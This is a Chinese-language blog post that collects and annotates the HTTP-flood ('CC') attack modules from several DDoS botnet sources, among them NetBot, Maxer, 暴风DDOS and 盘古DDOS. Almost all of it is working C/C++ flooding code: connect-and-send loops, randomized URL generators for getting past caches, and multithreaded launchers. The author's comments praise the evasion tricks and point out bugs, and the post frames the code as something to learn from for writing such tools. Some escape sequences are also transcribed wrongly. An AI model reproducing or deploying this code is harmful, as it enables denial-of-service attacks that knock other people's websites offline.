对现有的所能找到的DDOS代码(攻击模块)做出一次分析----CC篇
//=================================================================================
分析者:alalmn—飞龙 BLOG:http://hi.baidu.com/alalmn
分析的不好请各位高手见谅花了几个小时分析的呵呵
CC攻击
就是不断向 HTTP服务器 发送链接请求 达到服务器最高连接数的时候服务器自然就完蛋了
发送2个请求
GET
Post
在分析的发现很多好的地方 我都做了注释大家可以自己看代码呵呵
有些很值得我们学习
//=================================================================================
冷风的.h
/************************CC Attack***********************************/
unsigned long CALLBACK cc_flood(LPVOID dParam) //CC攻击
{
while (true)
{
char szBuffer
[1024]={0}; //HTTP头
sprintf(szBuffer,"GET %s HTTP/1.1/r/n" //要访问的页面(/list.asp?id=***)
"Accept:image/gif image/x-xbitmap, image/jpeg,application/x-shockwave-flash/r/n" //接收的数据类型 全部接收则
"Referer: http://www.google.com
/r/nAccept:-Language: zh-cn/r/n" //来源地址
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;
.NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)/r/n" //浏览器类型
"Cache-Control:no-cache/r/n" //响应缓存的意思 Cache-Control: no-store:这个才是响应不被缓存的意思。
"HOST:%s/n/n",DdosUrl); //攻击地址(网址) 这点应该是少写个参数吧 DdosUrl对应的是GET后面对应的页面 HOST:这个少个参数
SOCKADDR_IN sockAddr; //IP信息结构
SOCKET m_hSocket; //套接字
m_hSocket = socket(AF_INET,SOCK_STREAM,0); //创建socket socket第二个参数为SOCK_DGRAM,就是代表是UDP协议~
memset(&sockAddr,0,sizeof(sockAddr)); //内存空间初始化
sockAddr.sin_family = AF_INET; //sin_family 地址家族(必须是AF_INET)
sockAddr.sin_port=htons(DdosPort); //端口
sockAddr.sin_addr.S_un.S_addr=resolve(DdosUrl); //攻击IP
if (connect(m_hSocket,(SOCKADDR*)&sockAddr, sizeof(sockAddr)) != 0) //连接并 查看是否可以连接
{
int ret=GetLastError(); //返回错误代码值
printf("connect error id %d/n",ret); //输出错误代码编号
closesocket(m_hSocket); //关闭socket
Sleep(100); //暂停(毫秒)
continue; // 结束本次循环
}
if(SOCKET_ERROR==send(m_hSocket,szBuffer,sizeof(szBuffer),0)) //发送消息
{ //看是否发送成功 //IP结构体 要发送数据的缓冲区 要发送的数据的字节数 一般置0
closesocket(m_hSocket); //关闭socket
continue; //结束次循环
}
printf("."); //攻击一次输出一个点
Sleep(200); //暂停(毫秒)
}
return 0;
}
//=================================================================================
Maxer.h
SOCKET tcpConnect(char *host, int port)
{
SOCKET sock;
sock = socket(AF_INET, SOCK_STREAM, 0);
if(sock == INVALID_SOCKET)
return sock;
sockaddr_in sin;
sin.sin_addr.s_addr = resolve(host);
sin.sin_family = AF_INET;
sin.sin_port = htons(port);
if(connect(sock, (sockaddr *)&sin, sizeof(sin)) == SOCKET_ERROR)
{
closesocket(sock);
return INVALID_SOCKET;
}
return sock;
}
//普通CC攻击
DWORD WINAPI CC(LPVOID dParam)
{
PDDOSINFO pddosinfo = (PDDOSINFO)dParam;
DDOSINFO ddosinfo;
memcpy(&ddosinfo,pddosinfo,sizeof(DDOSINFO));
CString url;
url="GET "+rsCS("/")+" HTTP/1.1/r/n"
+"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*/r/n"
+"Accept-Language: zh-cn/r/n"
+"Accept-Encoding: gzip, deflate"
+"/r/nUser-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
+"/r/nHost:"+ddosinfo.addr
+"/r/nConnection: Keep-Alive"
+"/r/n/r/n";
while (1)
{
if (IsStop == 1)
{
ExitThread(0);
return 0;
}
SOCKET S=tcpConnect(ddosinfo.addr,ddosinfo.port); //创建一个套接字连接到已经存在的服务器
send(S,url,url.GetLength()+1,0); //发送消息
closesocket(S); //关闭套接字
Sleep(50); //延时
}
}
//=================================================================================
NetBot_Attacker.h
bool doHTTP(char* ServerName,DWORD port,char* ActionFile, char* Method,char* HttpHeaders, char* FormData)
{
//doHTTP("127.0.0.1",8080,"*(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html","GET","Cache-Control:
no-cache/r/nReferer: http://www.baidu.com
/r/n","");
HMODULE hDll;
LPVOID hSession,hConnect,hRequest;
bool bSendRequest=false;
char buf[1000];
DWORD dwFlags;
hDll = LoadLibrary("wininet.dll");
if(hDll)
{
typedef LPVOID ( WINAPI * pInternetOpen ) (LPCTSTR ,DWORD ,LPCTSTR ,LPCTSTR ,DWORD );
typedef LPVOID ( WINAPI * pInternetConnect ) ( LPVOID ,LPCTSTR ,WORD ,LPCTSTR ,LPCTSTR ,DWORD ,DWORD ,DWORD);
typedef LPVOID ( WINAPI * pHttpOpenRequest ) ( LPVOID ,LPCTSTR ,LPCTSTR ,LPCTSTR ,LPCTSTR ,LPCSTR FAR * ,DWORD ,DWORD);
typedef BOOL ( WINAPI * pHttpSendRequest ) (LPVOID ,LPCSTR ,DWORD ,LPVOID,DWORD) ;
typedef BOOL ( WINAPI * pInternetReadFile ) (LPVOID ,LPVOID ,DWORD ,LPDWORD) ;
typedef BOOL ( WINAPI * pInternetCloseHandle ) ( LPVOID );
pInternetOpen InternetOpen=NULL;
pInternetConnect InternetConnect=NULL;
pHttpOpenRequest HttpOpenRequest=NULL;
pHttpSendRequest HttpSendRequest=NULL;
pInternetCloseHandle InternetCloseHandle=NULL;
pInternetReadFile InternetReadFile=NULL;
InternetOpen = ( pInternetOpen ) GetProcAddress( hDll, "InternetOpenA" );
InternetConnect = (pInternetConnect ) GetProcAddress ( hDll, "InternetConnectA");
HttpOpenRequest = (pHttpOpenRequest) GetProcAddress (hDll,"HttpOpenRequestA");
HttpSendRequest = ( pHttpSendRequest ) GetProcAddress( hDll, "HttpSendRequestA" );
InternetCloseHandle = (pInternetCloseHandle) GetProcAddress (hDll,"InternetCloseHandle");
InternetReadFile = (pInternetReadFile) GetProcAddress(hDll,"InternetReadFile");
// 创建Internet
hSession = InternetOpen("Hackeroo",0, NULL, NULL, 0);
if (hSession != NULL)
{
// 连接服务器
hConnect = InternetConnect(hSession,ServerName,(WORD)port, NULL, NULL, 3, 0, 1);
if (hConnect!= NULL)
{
// 创建一个请求
LPTSTR AcceptTypes[2]={"*/*",NULL};
hRequest = HttpOpenRequest(hConnect,Method,ActionFile,"HTTP/1.1",NULL,(LPCTSTR*)AcceptTypes,0, 1);
if (hRequest!= NULL)
{
// 发送请求
bSendRequest =HttpSendRequest(hRequest,HttpHeaders,strlen(HttpHeaders),FormData,strlen(FormData));
if (bSendRequest)
{
memset(buf,0,1000);
InternetReadFile(hRequest, buf,999, &dwFlags);
printf("%s",buf);
}
}
}
// 清除句柄
if (hRequest)
InternetCloseHandle(hRequest);
if (hConnect)
InternetCloseHandle(hConnect);
if (hSession)
InternetCloseHandle(hSession);
}
FreeLibrary(hDll);
}
return bSendRequest;
}
unsigned long CALLBACK cc_attack(LPVOID dParam)
{
char all[100],ip[32],port[6],url[32],*point=NULL;
int httpport=80;
strcpy(all,fuckweb.FuckIP); //复制内存
point=all;
if(strstr(all,"http://")!=NULL) //strstr查找字符串
{//没有
point=point+strlen("http://"); //把http://添加进point
} //strlen计算字符串的长度
if(strstr(point,":")!=NULL) //strstr查找字符串 查找http后的:号的
{
memset(ip,0,sizeof(ip)); //内存空间初始化
strncpy(ip,point,strcspn(point,":")); //复制内存
point=point+strcspn(point,":")+1;
if(strstr(point,"/")!=NULL)
{
memset(port,0,sizeof(port));
strncpy(port,point,strcspn(point,"/"));
httpport=atoi(port);
point=point+strcspn(point,"/");
memset(url,0,sizeof(url));
strcpy(url,point);
}
}
else
{
if(strstr(point,"/")!=NULL)
{
memset(ip,0,sizeof(ip));
strncpy(ip,point,strcspn(point,"/"));
point=point+strcspn(point,"/");
memset(url,0,sizeof(url));
strcpy(url,point);
}
}
if (strlen(url)<2)
{
strcpy(url,"^*%%RFTGYHJIRTG*(&^%DFG.asp");//要访问的页面(/^*%%RFTGYHJIRTG*(&^%DFG.asp) 真应该调试看看url他输出的是什么内容
}
while(!stopfuck)
{
doHTTP(ip,
httpport,
url,
"GET",
"Cache-Control: no-cache/r/nReferer: http://www.baidu.com
/r/n",
"");
Sleep(40);
}
return 0;
}
//=================================================================================
暴风DDOS.h
/////////////CC TCP数据 end///////////////////
SOCKET tcpConnect(char *host, int port)
{
SOCKET sock;
sock = socket(AF_INET, SOCK_STREAM, 0);
if(sock == INVALID_SOCKET)
return sock;
sockaddr_in sin;
DWORD ip = resolveIP(host);
if(ip == 0)
ip = inet_addr(host);
sin.sin_addr.s_addr = ip;
sin.sin_family = AF_INET;
sin.sin_port = htons(port);
if(connect(sock, (sockaddr *)&sin, sizeof(sin)) == SOCKET_ERROR)
{
closesocket(sock);
return INVALID_SOCKET;
}
return sock;
}
volatile bool rnd;
/////////////CC tcp数据///////////////////////////////////////////////////////////////
CString rsCS(CString str) //str=/
{
CString NewStr,tempstr,nstr;
CString CStr,Func;
char fu;
int LFunc;
int i,x=0;
if (rnd==false) return str; //并没有找到rnd的判断条件
srand((unsigned)time( NULL )); //产生随机数
NewStr=str; // "/"
while ((x=NewStr.Find ("+",0))!=-1) //搜索字符串 没有找到子字符串或字符则返回-1
{ //那说明是搜索到了
tempstr="";
CStr="";
nstr=NewStr.Mid (x,3); //提取字符串
Func=NewStr.Mid (x+1,1); //提取字符串
memcpy(&fu, Func, 1); //复制内存
LFunc=atoi(NewStr.Mid (x+2,1)); //将字符串转换成一个整数值
switch(fu) //fu是从str抽取其中的一个值
{
case 'N':
for(i=0;i<LFunc;i++)
{tempstr.Format ("%c",48+rand()%10); //格式化一个随机数
CStr+=tempstr;} //累加到CStr里面
break;
case 'U':
for(i=0;i<LFunc;i++)
{tempstr.Format ("%c",65+rand()%26);CStr+=tempstr;}
break;
case 'L':
for(i=0;i<LFunc;i++)
{tempstr.Format ("%c",97+rand()%26);CStr+=tempstr;}
break;
case 'C':
for(i=0;i<LFunc;i++)
{tempstr.Format ("%%%c%c%%%c%c",65+rand()%6,48+rand()%10,65+rand()%6,48+rand()%10);CStr+=tempstr;}
break;
default: //为什么只判断这几个特定的字符呢
tempstr="";
CStr="";
break;
}
NewStr.Replace (nstr,CStr); //替换字符数 替换完成在去上边循环一次
}
return NewStr;
}
char* zIP;
void cc_flood()
{
int mi;
CString buf,url,http,rhost,arg1,arg2,larg;
http = zIP; //IP地址 站点
rhost = http;
char *jj = "/";
if (http.Left(1)=="G") //奇怪传递过来的攻击IP当中怎么会存在G这个字母呢 看了几遍服务端代码也没看明白
{
//Get Mode,No Sorted Mode Get模式,无排序模式
http=http.Right (http.GetLength ()-1); //写这句话没什么意义啊
url="GET "+rsCS(jj)+" HTTP/1.1/r/n" //要访问的页面(/list.asp?id=***) rsCS(jj)处理过后返回的还是/那有什么意义呢
+"Accept: */*/r/n" //接收的数据类型 全部接收则
+"Referer:"+http //这点不错啊 来源改成他自己站点 想屏蔽都难
+"/r/nAccept-Language: zh-cn/r/nAccept-Encoding: gzip, deflate/r/n" //来源地址
+"User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows 5.1)" //浏览器类型
+"/r/nHost:"+rhost //攻击地址(网址)
+"/r/nProxy-Connection: Keep-Alive/r/nPragma: no-cache/r/n";
}
else
{
//Post Mode,No Sorted Mode Post模式,无排序模式
arg1=http.Right(http.GetLength ()-1); //去掉GP
mi=http.Find("?",0);if (http.Find("?",mi+1)>0) mi=http.Find("?",mi+1); //找到参数的位置
arg2=rsCS(arg1.Right(arg1.GetLength ()-mi)); //获得参数arg2并且做处理
arg1=rsCS(arg1.Left(mi-1)); //获得要提交的URL
larg.Format ("%d",arg2.GetLength()); //获得参数长度larg
url="GET "+rsCS(jj)+" HTTP/1.1/r/n"
+"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*/r/n"
+"Accept-Language: zh-cn/r/n"
+"Accept-Encoding: gzip, deflate"
+"/r/nUser-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
+"/r/nHost:"+rhost
+"/r/nConnection: Keep-Alive"
+"/r/n/r/n";
}
while (1)
{
if (StopFlag == 1)
{
ExitThread(0);
return;
}
SOCKET S=tcpConnect(tgtIP,tgtPort); //创建一个套接字连接到已经存在的服务器
for(int i=0;i<10000;i++) //发送1W次 休息一定时间在 进行发送那位什么要 关闭套接字 呢
{
send(S,url,url.GetLength() ,0); //发送消息
closesocket(S); //关闭套接字
}
Sleep(SleepTime); //延时
}
}
void StartCC(char ip[30],int port,int time,int xc)
{
zIP=ip;
if (inet_addr(ip)== INADDR_NONE)
{
struct hostent *hp = NULL;
if ((hp = gethostbyname(ip)) != NULL)
{
in_addr in;
memcpy(&in, hp->h_addr, hp->h_length);
strcpy(tgtIP,inet_ntoa(in));
}
}
else
strcpy(tgtIP,ip);
tgtPort=port;
timeout=time;
StopFlag = -1;
for(i=0;i<xc;i++)
{
h=CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)cc_flood, NULL, 0, NULL);
}
CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)wait_for_end, NULL, 0, NULL);
}
//
暴风DDOSVIP2010-225.h
CC攻击代码被删除了 不知道是人家给我代码的问题还是 本来发布的时候就删除掉了
//
盘古DDOS优化版.h
///CC
void ccflood() //变异CC
{
CString url,jj="/";
url="GET "+rsCS(jj)+" HTTP/1.1" //访问页面
+"/r/nHost: "+zip //攻击网站
+"/r/n/r/n";
WSADATA WSAData; //这个结构被用来存储 被WSAStartup函数调用后返回的 Windows Sockets 数据
WSAStartup(MAKEWORD(2,2) ,&WSAData); //确定SOCKET版本
SOCKADDR_IN sockAddr; //IP信息结构
SOCKET m_hSocket; //套接字
memset(&sockAddr,0,sizeof(sockAddr)); //内存空间初始化
sockAddr.sin_family = AF_INET; //sin_family 地址家族(必须是AF_INET)
sockAddr.sin_port=htons(tgtport); //存储端口号(使用网络字节顺序)
sockAddr.sin_addr.s_addr = inet_addr(tgtip); //inet_addr将ip地址转换成网络地址
if ((sockAddr.sin_addr.s_addr = inet_addr(tgtip)) == INADDR_NONE)
{//inet_addr将ip地址转换成网络地址 IP地址不正确返回INADDR_NONE
struct hostent *hp = NULL;
if ((hp = gethostbyname(tgtip)) != NULL)
{
memcpy(&(sockAddr.sin_addr), hp->h_addr, hp->h_length);
sockAddr.sin_family = hp->h_addrtype;
}
else
return;
}
for(;;)
{
if (Stop == 1)
{
ExitThread(1);
return;
}
m_hSocket = socket(PF_INET,SOCK_STREAM,0); //创建socket
if (connect(m_hSocket,(SOCKADDR*)&sockAddr, sizeof(sockAddr)) != 0) //连接并 查看是否可以连接
continue; //结束本次循环
for(int a=0;a<1024;a++)
{
if (send(m_hSocket,url,url.GetLength(),0) ==SOCKET_ERROR) //发送消息 看是否发送成功
break; //关闭循环
}
Sleep(20); //暂停(毫秒)
//这好像少了一句关闭套接字
}
return;
}
//=========================================================
我群里人发布的一段.h
int SEU_RandEx(int min, int max)
{
if(min == max)
return min;
srand(GetTickCount());
int seed=rand()+3;
return seed % (max - min + 1) + min;
}
DWORD WINAPI CC1(LPVOID dParam)
{
char zz[MAX_PATH];
PDDOSINFO pddosinfo = (PDDOSINFO)dParam; //可以看出还是Maxer 攻击的那个结构体呵呵
DDOSINFO ddosinfo;
memcpy(&ddosinfo,pddosinfo,sizeof(DDOSINFO));
wsprintf(zz,"%s/%c%c%c.txt",ddosinfo.addr,SEU_RandEx('a','z'),SEU_RandEx('b','y'),SEU_RandEx('c','y'));
//你这样输出出来的类似 http://hi.baidu.com/alalmn%s/%c%c%c.txt
难道你不知道静态页面很难被D夸吗
//自己看下这个 文章吧 http://hi.baidu.com/alalmn/blog/ ... c58a4f43a9ad77.html
//
wsprintf(zz,"ddosinfo.addr%c%c%c.%c%c%%c.com/",SEU_RandEx('a','z'),SEU_RandEx('b','y'),SEU_RandEx('c','y'),SEU_RandEx('d','z'),SEU_RandEx('e','y'),SEU_RandEx('b','y'));
// CString url;
CString url;
CString zzs;
zzs.Format("%s",zz); //这个地方不对了 我看人家的都是写的访问页面 应该是这样的 //要访问的页面(/list.asp?id=***) 而没有写http://123131 这样的信息呢
//不知道是你这样写可行吗
// wsprintf(url,"GET %s HTTP/1.1/r/n",zz);
// wsprintf(url,"GET %s HTTP/1.1/r/n",zz);
url="GET "+zzs+" HTTP/1.1/r/n"
+"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*/r/n"
+"Accept-Language: zh-cn/r/n"
+"Accept-Encoding: gzip, deflate"
+"/r/nUser-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
+"/r/nHost:"+ddosinfo.addr
+"/r/nConnection: Keep-Alive"
+"/r/n/r/n";
while (1)
{
SOCKET S=tcpConnect(ddosinfo.addr,ddosinfo.port); //创建一个套接字连接到已经存在的服务器
if (IsStop == 1) //判断攻击状态
{
closesocket(S);
ExitThread(0);
return 0;
}
send(S,url,url.GetLength()+1,0); //发送消息
Sleep(50); //延时
}
}
//=======================================================
|
